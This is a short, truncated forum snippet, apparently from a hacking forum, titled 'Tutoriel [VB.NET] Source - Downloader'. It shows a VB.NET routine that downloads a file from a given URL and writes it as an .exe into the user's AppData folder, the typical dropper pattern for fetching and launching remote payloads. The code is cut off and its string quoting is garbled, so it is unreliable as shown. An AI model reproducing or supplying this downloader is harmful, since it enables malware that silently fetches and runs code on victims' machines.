downloader

  1. Kilo-25

    Tutoriel [VB.NET] Source - Downloader

    Public Shared Sub downloader(ByVal url as string, ByVal LaunchName as String) Dim wc As New WebClient : Dim pths As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) : IO.File.WriteAllBytes(pths + ""/" & LaunchName & ".exe"", wc.DownloadData(""" + url + """)) ...